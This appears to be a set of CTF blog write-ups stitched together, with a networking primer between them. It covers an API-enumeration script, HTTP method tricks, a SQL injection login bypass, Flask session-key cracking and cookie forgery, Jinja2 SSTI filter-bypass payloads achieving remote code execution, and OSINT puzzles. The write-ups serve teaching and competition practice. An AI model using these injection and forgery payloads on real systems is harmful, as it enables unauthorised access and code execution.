BASE_URL = "http://167.99.34.2:5050"
MONITOR_URL = f"{BASE_URL}/api/monitor"
OPTIONS_URL = f"{BASE_URL}/api/options"

def find_correct_path():
    session = requests.Session()
    requests.post(f"{BASE_URL}/api/reset") # Start fresh
    
    options = requests.get(OPTIONS_URL).json().get("allPossibleCommands", {})
    correct_path = []
    current_step = "1"
    
    while current_step in options:
        found_next = False
        for cmd in options[current_step]:
            resp = session.post(MONITOR_URL, json={"command": cmd})
            data = resp.json()
            
            if data.get("status") == "continue":
                next_step = data.get("next_step")
                
                # Check for the Gate/Loop
                if next_step == current_step:
                    print(f"[!] Hit a gate at Step {current_step} with command: {cmd}")
                    print(f"[*] Message: {data.get('message')}")
                    return correct_path + [cmd]

                correct_path.append(cmd)
                current_step = next_step
                found_next = True
                break
    return correct_path

if __name__ == "__main__":
    final_path = find_correct_path()

Script Output:

The script successfully cleared Steps 1, 2, and 3, but hit a “Secret Gate” at Step 4: "The gate refuses to move... Scratched around the keyhole is a single question: WHAT IS THE SECRET COMMAND?"

🕵️ Phase 4: Finding the Fifth Path

Checking /robots.txt revealed a critical hint:

Plaintext

User-agent: *
Allow: /
# Old trails answered to more than one method.

This hinted at using a different HTTP Method. I used the OPTIONS method on the /api/options endpoint while carrying my valid trail_id cookie.

The Exploit Request (Burp Suite):

OPTIONS /api/options HTTP/1.1
Host: 167.99.34.2:5050
Cookie: trail_id=YNIkXNr45po3QsvGQAJgWdZ4rgixMA2x
...

The Response:

HTTP/1.1 204 NO CONTENT
Allow: GET, OPTIONS
X-Trail-Head: ASK THE FOREST
X-Trail-Tail: FOR A FIFTH PATH
X-Map-Note: Old methods still answer old trails.
Access-Control-Expose-Headers: Allow, X-Trail-Head, X-Trail-Tail, X-Map-Note

The custom headers provided the secret command: ASK THE FOREST FOR A FIFTH PATH.

🏁 Phase 5: The Final Exploit

I sent the combined secret command as a POST request to /api/monitor:

Final Request:

POST /api/monitor HTTP/1.1
Host: 167.99.34.2:5050
Content-Type: application/json
Cookie: trail_id=...

{"command": "ASK THE FOREST FOR A FIFTH PATH"}

Final Response: "The hidden path opens, and the forest finally lets you leave."

Final Flag: CATF{4sk1ng_f0r_A_f1f7h_0p710n_1t_4l4w4ys_h3lpful}

Most people use these terms interchangeably, but in the world of Cyber Security, precision is key.

How the Internet Works

The Internet is the physical infrastructure—the “Network of Networks.” It consists of hardware like routers, switches, and fiber-optic cables. It uses IP Addresses to route small chunks of data called Packets from one point to another.

How the Web Works (WWW)

The World Wide Web is a service that runs on top of the internet. It uses the HTTP protocol to transmit documents (HTML, CSS, images). If the Internet is the highway, the Web is one specific type of truck driving on it.

The Client-Server Model

This is the basic interaction of the web:

• The Client: The requester (your browser, a mobile app, or a CLI tool like curl).
• The Server: A powerful computer that “serves” the requested data.

2. HTTP Crash Course

HyperText Transfer Protocol (HTTP) is the language of the web. It operates on the Application Layer.

Key HTTP Methods

• GET: Retrieve data from a server (viewing a page).
• POST: Send data to a server (logging in, uploading a file).
• PUT/PATCH: Update existing data on the server.
• DELETE: Remove data from the server.

Important Status Codes

• 200 OK: Success.
• 301/302: Redirects.
• 401/403: Unauthorized or Forbidden.
• 404: Not Found.
• 500: Internal Server Error.

3. Networking Models: OSI vs. TCP/IP

To standardize communication, we use layered models.

4. The Transport Layer: TCP, UDP, & ICMP

TCP (Transmission Control Protocol)

TCP is “connection-oriented” and reliable. It ensures data arrives intact and in order via the Three-Way Handshake:

1. SYN: “Let’s synchronize.”
2. SYN-ACK: “Acknowledged, let’s sync.”
3. ACK: “Acknowledged, starting data transfer.”

UDP (User Datagram Protocol)

UDP is “connectionless.” It sends data without checking if it arrived. It’s much faster but unreliable.

• Use Cases: Gaming, Streaming, DNS.

ICMP (Internet Control Message Protocol)

ICMP is used for diagnostic and error messages. It doesn’t carry user data. The ping command is the most common use of ICMP.

5. Protocols: SSH, Telnet, & FTP

6. Essential Network Tools

Ping

Checks if a host is reachable and measures latency (round-trip time).

ping <IP_or_Domain>

Traceroute

Maps the path packets take to reach a destination, showing every router (hop) along the way.

traceroute <IP_or_Domain>

Nmap (Network Mapper)

The gold standard for reconnaissance. It discovers hosts, open ports, and services.

• Service Scan: nmap -sV <target>
• Default Scripts: nmap -sC <target>

0xaskar’s Summary

Understanding these fundamentals is the difference between a “Script Kiddie” and a professional security analyst. Always start with the basics:

1. Is the host alive? (Ping)
2. What ports are open? (Nmap)
3. What protocol is it using? (HTTP/SSH/FTP)

Hello everyone!

Hello everyone! I’m really excited to share this post with you all. This time, things are a bit different! For the first time ever, I’ve stepped into the shoes of a Web Challenge Author for N!ghtM4re CTF 2026 🥳🥳.

It’s been an incredible experience moving from the “solver” side to the “architect” side. Designing these challenges was a lot of fun—thinking about how to hide the flags and creating tricky paths for the players really opened my eyes to how the web works from the inside out. I’m honestly so happy with how they turned out and seeing everyone’s creative solutions was the best part of the journey.

In this post, I’ll be breaking down web challenges, ranging from Basic to Hard. Whether you’re a beginner or a pro, I hope you find these writeups helpful and enjoy the logic behind them!

🚩 1. Challenge Write-up: Bl1nd Fa1th

=========================================

🛠️ General Information

• Challenge Name: Bl1nd Fa1th

• Difficulty: Basic

• Author: D3xter

📜 The Description

“There is a rule in place. It was never written. It was never questioned.”

🔍 Stage 1: The Hidden Whisper (Reconnaissance)

Upon landing on the challenge page, I was greeted by a standard Login interface. No obvious hints, no flashy clues.

But a true researcher knows that the best secrets are often hidden in plain sight.

I performed an Inspect Element to dive into the source code. Nestled within the comments, I found a developer’s note left behind.

The first piece of the puzzle:

• Target Username: @dmindex021

🔓 Stage 2: Breaking the Logic (Exploitation)

Now I had the identity, but the password was still a black box. Instead of guessing or brute-forcing,

I decided to attack the underlying logic of the database.

I opted for a classic SQL Injection (SQLi) bypass. By injecting a logical tautology into the password field,

I could trick the server into validating the login regardless of the actual password.

• Input Payload: 1' or 1=1--

The Breakdown:

• The ' closes the original string.

• The or 1=1 creates a condition that is always True.

• The -- (comment) tells the database to ignore the rest of the original query.

🏆 Stage 3: System Access (The Flag)

The moment I hit Login, the system’s defenses crumbled, granting me full access:

The Flag: N!ghtM4re{5ql_15_n0t_4_8u6_1t5_4_f34tur3!!}

🚩 2. Challenge Write-up: SODA3

=========================================

🛠️ General Information

• Challenge Name: SODA3

• Difficulty: Easy

• Author: Kud0x1

📜 The Description

“When nothing remains, everything becomes possible.”

The challenge presents us with an “Internal File Manager.” It seems simple: you can create files or reset the environment. But as we know, the most straightforward paths often have the most interesting locks.

🔍 Stage 1: The Gatekeeper (Reconnaissance)

Upon entering the challenge, I saw a dashboard with a few options: Create, Files, and a Reset button. There was already a file named flag sitting there, but clicking it led to a dead end:

Response: You have to reset the files first!

Naturally, I tried to hit the Reset button. I intercepted the request in Burp Suite to see what was happening under the hood.

🚧 Stage 2: The Blocked Path (Method Not Allowed)

The application was sending a POST request to /reset. However, the server responded with a cold: HTTP/1.1 405 METHOD NOT ALLOWED

Looking at the Allow header in the response, the server dropped a huge hint: Allow: HEAD, OPTIONS

The standard POST method was disabled for resetting, but the server was still listening for HEAD requests.

🔓 Stage 3: The HEAD Trick (Exploitation)

A HEAD request is identical to a GET request, but the server returns only the headers and no body. Sometimes, developers forget to apply the same security restrictions to HEAD as they do to POST or GET.

I decided to bypass the restriction using Curl to force a HEAD request to the reset endpoint:

curl -X HEAD http://nightmare.offgrayeg.com:7878/reset

The command executed successfully. Even though I didn’t see a “Success” message (because HEAD doesn’t return a body), the server-side logic was triggered, and the files were reset!

🏆 Stage 4: Capturing the Flag Now that the “Reset” condition was satisfied, I went straight for the gold. I requested the flag file again using a simple GET request:

curl http://nightmare.offgrayeg.com:7878/flag

The Flag: N!ghtM4re{H34D_Req_Ar3_N0t_Alw4ys_S4f3!!} als:

🚩 3. Challenge Write-up: 7ru57 155u35

=========================================

🛠️ General Information

• Challenge Name: 7ru57 155u35

• Difficulty: Medium

• Author: D3xter

📜 The Description

“A quiet system. A simple workflow. Or so it appears.”

The challenge presents us with a minimalist web application. The initial message is simple: “Want some Coffee? Please register to continue…”

It seems like a straightforward user registration flow, but in CTFs, the simplest workflows often hide the most interesting security flaws.

🔍 Stage 1: The Coffee Break (Reconnaissance)

I started by following the application’s instructions and proceeded to the Register page. I created a standard account with the following credenti

• Username: 0xaskar
• Password: 0xaskar

After registering and logging in, I was greeted with a “Welcome 0xaskar” message and a note saying “Everything looks normal… for now.”

🕵️ Stage 2: Decoding the Identity (Cookie Analysis)

To understand how the application handles sessions, I intercepted the request in Burp Suite. I noticed a session cookie that looked like a typical Flask session or a JWT.

I took the cookie to jwt.io to inspect its structure. The payload revealed two interesting fields: ` { “is_admin”: false, “username”: “0xaskar” } `

The presence of an is_admin flag set to false immediately suggested that privilege escalation was the intended goal.

🔨 Stage 3: Breaking the Seal (Brute-forcing Secret Key)

Since the session was a signed Flask cookie, I couldn’t just modify the is_admin flag without the Secret Key. I decided to attempt a brute-force attack on the signing key using flask-unsign and the rockyou.txt wordlist.

flask-unsign --unsign --cookie 'eyJpc...........' --wordlist 'rockyou.txt'

The tool successfully cracked the key: Secret Key: chocolate

🎭 Stage 4: The Masquerade (Session Hijacking)

With the secret key in hand, I could now forge my own session cookie. I used flask-unsign again to sign a new cookie where is_admin was set to True.

flask-unsign --sign --cookie "{'is_admin': True, 'username': '0xaskar'}" --secret 'chocolate'

I replaced my original session cookie with this newly forged one in the browser’s developer tools.

🏆 Stage 5: Capturing the Flag

After updating the cookie, I navigated to the /flag endpoint. The server, now convinced that I was the administrator, granted me access to the hidden treasure.

The Flag: N!ghtM4re{jw7_0r_fl45k_1_d0n7_c4r3!!}

🚩 4. Challenge Write-up:

=========================================

🛠️ General Information

• Challenge Name: D0tless Pr1s0n

• Difficulty: Hard

• Author: 0xaskar

📜 The Description

“In a world of dots and lines, I am the one who holds the eraser. You don’t play against the code, you play against 0xaskar.”

The challenge greets us with a “Secure Card Generator System.” It asks for a Subject Name and a Designation. On the surface, it looks like a simple utility to generate identity cards.

🔍 Stage 1: The Secure Card (Reconnaissance)

I started by entering some basic information:

• Subject Name: 0xaskar
• Designation: Stalker

The system generated a card as expected. Given that the input is being reflected on the card, the first thing that comes to mind in a web challenge is Server-Side Template Injection (SSTI).

🕵️ Stage 2: Probing the Walls (Filter Identification)

To confirm SSTI and identify the template engine, I tried several payloads in the “Designation” field. The payload \{\{7*7\}\} was evaluated and returned 49, confirming that the application is using the Jinja2 (Python) template engine.

🧱 Stage 3: The Restricted Zone (Detection Escalation)

The application had a robust detection system. Whenever I used common SSTI keywords or characters, I received a strict alert:

SYSTEM ALERT: 0xaskar says: 🛑 Nice try! (Detected: ‘_’, ‘mro’, ‘base’)

After further testing, I compiled a list of forbidden elements:

• _ (Underscore)
• . (Dot)
• [ and ] (Brackets)
• Keywords: mro, base, class, base, [, ], etc.

🔓 Stage 4: Shattering the Dots (SSTI Bypass Strategy)

To bypass these filters, I needed a way to access object attributes without using the restricted characters.

1. Hex Encoding for Characters: I replaced the . with its hex equivalent \x2e and the _ with \x5f. Example: self\x2e\x5f\x5finit\x5f\x5f instead of self.__init__.

2. Using the attr Filter: Since dots . were blocked, I used Jinja2’s attr filter to access attributes. Instead of obj.attribute, I used obj|attr('attribute').

3. Using request Object: The request object is often available in Flask templates and can be used as a starting point to reach the application and its globals.

Combining these techniques, I could craft a payloads that avoided all detections: \{\{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')\}\}

\{\{lipsum|attr('\x5f\x5fglobals\x5f\x5f')|attr('get')('os')|attr('popen')('ls')|attr('read')()\}\}

\{\{self|attr('\x5fTemplateReference\x5f\x5fcontext')|attr('get')('cycler')|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('get')('os')|attr('popen')('id')|attr('read')()\}\}

Note: You must remove the backslash (\) from the payloads when using them; it was added here only to avoid rendering issues in the browser.

💥 Stage 5: Prison Break (Executing RCE)

Now that I could access builtins, I could import the os module to achieve Remote Code Execution (RCE). I used popen to execute system commands.

RCE Payload (to list files):

\{\{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls')|attr('read')()\}\}

🏆 Stage 6: Capturing the Flag

The final step was to read the flag. I used cat flag.txt, but remembering to bypass the dot in the filename using \x2e.

Final Payload:

The Flag: N!ghtM4re{0xAsk4r_Is_W4tching_U_SST1ing_My_Server_Bruh}

💡 Lesson Learned

This challenge is a masterclass in SSTI filter bypass. It teaches us that blacklisting characters like dots and underscores is not a sufficient defense. By using alternative attribute access methods (like attr) and character encoding (hex), an attacker can still navigate the Python object hierarchy. The only true defense is to avoid passing user-controlled input directly into template evaluation or to use a highly restricted sandbox environment.

Hello everyone!

This post is a special milestone in my journey. For the first time, I stepped away from the player’s seat and took on the role of an OSINT Challenge Author for N!ghtM4re CTF🥳🥳.

Designing these challenges was an incredible experience—moving from solving puzzles to crafting them requires a different perspective. I wanted to create scenarios that feel real, blending deep-web investigation with real-world criminal profiling. I’m thrilled with the feedback from the participants and seeing the creative ways they approached my challenges.

Below are the writeups for the 3 OSINT challenges I designed, ordered from Easy to Hard.

1. The Royal Neighbor (Easy)

📝 The Challenge Description

“I was wandering around this academic building when I decided to take a break. Just a few steps away, I entered a nearby garden and stumbled upon a fountain featuring a dragon’s head. It looked quite familiar, almost like it was designed by a legendary architect who shaped the whole city.

I took a photo of the faculty building before I left. Can you find the name of that hidden dragon fountain?”

Flag Format: N!ghtM4re{Name_of_the_fountain}

Note on Flag Sensitivity: Accuracy is key! The name of the fountain must be written with the correct Catalan accents and specific casing. Note the difference between a standard “e” and the accented “é”.

How to format the name: To help you format the name correctly, here are two examples using different names to show how special characters, casing, and accents work:

• Example 1 (Apostrophe & Casing): If the answer was Joan d’Alacant, the flag would be: N!ghtM4re{Joan_d'Alacant} (Note the small d and capital A).
• Example 2 (Accents): If the answer was Castell de Mercè, the flag would be: N!ghtM4re{Castell_de_Mercè} (Note the è instead of e).

🔍 Phase 1: Visual Identification

The investigation began with the challenge photo of a modern, academic-looking building.

Analysis: I performed a Reverse Image Search (using Google Lens/Yandex) on the faculty building photo.

The Breakthrough: The search results immediately identified the building as the Facultat de Dret (Faculty of Law) at the University of Barcelona (UB) in Barcelona, Spain. The unique architectural lines and the specific mural on the building are iconic to this campus located on Avinguda Diagonal.

🌳 Phase 2: Locating the “Royal” Break Spot

The challenge description provided a narrative clue:

“Just a few steps away, I entered a nearby garden and stumbled upon a fountain featuring a dragon’s head.”

Mapping the Area: By checking satellite imagery and maps around the Facultat de Dret, I noticed a large green space directly adjacent to the university grounds: Jardins de Pedralbes (the gardens of the Royal Palace of Pedralbes).

🐉 Phase 3: The Legendary Architect’s Work

The description mentioned a fountain with a dragon’s head designed by a legendary architect who “shaped the whole city.”

Investigation:

1. Barcelona’s most legendary architect is undoubtedly Antoni Gaudí.
2. I searched for “dragon fountain”
3. I discovered the Font d’Hèrcules (Hercules Fountain).

Historical Context: This fountain features a wrought-iron dragon’s head as a spout. Interestingly, it was overlooked for years and “hidden” by overgrown vegetation until it was restored and rediscovered in the 1980s, matching the challenge’s lore perfectly.

Final Flag:N!ghtM4re{Font_d'Hércules}

==============================================

2. A Weird Challenge (Medium)

📝 The Challenge Description

“I took this photo right before hopping on the metro. I was starving, so I only rode for one station and got off. The station I arrived at made me feel like I was protected from the rain, even though the sun was shining!

Just a few steps away from the exit, I found a restaurant with a very weird menu. Who would have thought you could order Liver and Brains along with a Crepe from the same place?! The name is a bit of a mouthful, but the spot is iconic.

I saved their phone number from the Google Maps. Can you find it?”

The Original Challenge Photo:

Flag Format: N!ghtM4re{Restaurant Phone Number}

🔍 Step 1: Where did we start?

First, I had a photo of a metro station. I used Google Reverse Image Search and added the keyword “Metro” to help the search engine.

The search confirmed that the starting point is Kolleyet El-Zeraa Station (Faculty of Agriculture).

🚇 Step 2: One station away… but where?

The description says: “I only rode for one station and got off.”

I checked the official Cairo Metro website to see the map. From Kolleyet El-Zeraa, riding for one station leads to only two possibilities:

1. Shobra El-Kheima Station
2. Mazallat Station

💡 Step 3: Solving the Riddle

Now, let’s look at the hint: “The station I arrived at made me feel like I was protected from the rain, even though the sun was shining!”

What protects you from the rain? Umbrellas! ⛱️ In Arabic, “Umbrellas” means “Mazallat” (مظلات).

Bingo! The destination is Mazallat Metro Station.

🍔 Step 4: Finding the “Weird Combo”

The description mentioned a restaurant right outside the exit with a very strange menu: Liver, Brains, and Crepes! (Yes, a very weird combo indeed 😂).

I went to Google Maps, searched near Mazallat Station, and looked for restaurants.

I found it: “Kebda w Mokh w Crepe El-Iman Asran” (كبدة ومخ وكريب الايمان عصران). The name is definitely a “mouthful”!

I checked the “About” section on Google Maps to find the phone number.

🏁 The Flag

The phone number listed is 01111132001.

Final Flag: N!ghtM4re{01111132001}

==============================================

3. Operation: Ghost in the Cage (Hard)

💀 The Challenge Description

“A high-ranking individual on the FBI’s Cyber Most Wanted list is known for operating one of the most sophisticated Carding Shops in the underground scene. This Russian national specialized in the large-scale theft and sale of financial access devices and stolen identities. He didn’t just sell credentials; he managed a massive digital warehouse that bridged the gap between raw data and illegal profit. His operation was a primary source for cyber-criminals worldwide, providing the keys to thousands of private accounts and financial platforms.”

Criminal Profile:

• Nationality: Russian

• Specialization: Managing a “Carding” enterprise and identity fraud.

• Status: Fugitive. Known for hiding his true identity behind multiple layers of digital noise.

Mission Objectives:

1. Identify the Alias.

2. Locate the Evidence: Track down his development history.

3. The Extraction: Find the final flag hidden inside a backup project.

🔍 Phase 1: Criminal Profiling & Reconnaissance

The investigation began by analyzing the key indicators provided in the description: “FBI’s Cyber Most Wanted list”, “Carding Shops”, and “Russian National”.

Using a targeted Google Dork, I filtered through the noise to find specific FBI indictments matching this profile:

Search Query: intext:"FBI's Cyber Most Wanted list" "Carding Shops" "Russian"

The Breakthrough: The results pointed to Igor Dekhtyarchuk. Reports from the Department of Justice (DoJ) identified him as the administrator of “Marketplace A”, a sophisticated underground carding shop.

Investigator’s Note: Deep inside the indictment text was the golden lead: “FBI investigators were able to track Dekhtyarchuk’s presence in the hacking community back to November 2013 when he joined hacker forums under the alias ‘floraby’.”

Target Alias Identified: floraby.

🕵️ Phase 2: Digital Footprint Analysis (OSINT)

With the alias floraby, it was time to map his digital footprint. I used Sherlock to scan for the username across social and technical platforms.

Command: sherlock floraby

The Results: The scan yielded several hits, but the most relevant for a developer/criminal profile were:

• GitHub: https://www.github.com/floraby

• Telegram: https://t.me/floraby

• Archive.org: https://archive.org/details/@floraby

Analyzing the GitHub Profile: Navigating to his GitHub confirmed our target. The bio read:

_“Student at Ural State

Python & Java Enthusiast

Interested in Web Auth.”_ Location: Kamensk-Uralsky, Russia

This location and education history perfectly matched the FBI’s wanted poster for Dekhtyarchuk.

💻 Phase 3: Source Code Audit

Criminals often reuse code or leave “backdoors” for themselves. I audited his repositories and found Auth-Project-v1.0.

Inside auth_provider.py, I discovered a suspicious hardcoded variable:

Python

# Fallback gateway for encrypted communications
# Use hex decoder to reveal the secure endpoint
INTERNAL_GATEWAY = "68747470733a2f2f742e6d652f666c6f726162795f63616765" 

Decoding the Payload: I took the hex string to CyberChef. Using the “From Hex” operation, it revealed a hidden Telegram link: https://t.me/floraby_cage

📱 Phase 4: Infiltration & The Seizure

The link led to a private Telegram channel named floraby_cage. The channel was used to post marketplace inventory (Cookies, SSNs, and bank logs).

However, the author of the challenge, 0xaskar, had already compromised the channel, leaving a “Seizure Notice” post:

🚫 SEIZED BY 0xaskar “To the ‘Ghost’ running this channel: Your OpSec was good, but your history was better. I left a little souvenir in your backup file.”

The Backup File: The post contained a file: Marketplace_A_Full_Backup.zip. Upon trying to open it, I was prompted for a password.

The Password Hint:

🔒 Archive Password: The name of the place where I learned to code. (My Alma Mater in Kamensk). Format: NameState (Case Sensitive)

Referring back to the GitHub Bio from Phase 2, the university was Ural State.

Password: UralState

🖼️ Phase 5: Forensics & Extraction

Inside the archive, I found two files:

1. READ_BEFORE_PANIC.txt

2. 0xaskar_was_here_you_are_late.jpg (A photo of the suspect).

The Final Clue: The text file contained a taunt:

“Finding the cage doesn’t mean you own the ghost. The question is: are you just looking at the ‘Image’, or are you smart enough to see the ‘Data’?”

This directed me toward Metadata analysis. I used exiftool to inspect the image’s hidden headers.

Command: exiftool 0xaskar_was_here_you_are_late.jpg

The Result: Inside the metadata tags, the flag was hidden within the Artist field:

• Artist: N!ghtM4re{0xaskar_hunted_the_floraby_shadow}

• Comment: 0xaskar was here, floraby was there, and you... you are just reading the metadata <3

🚩 Final Flag

N!ghtM4re{0xaskar_hunted_the_floraby_shadow}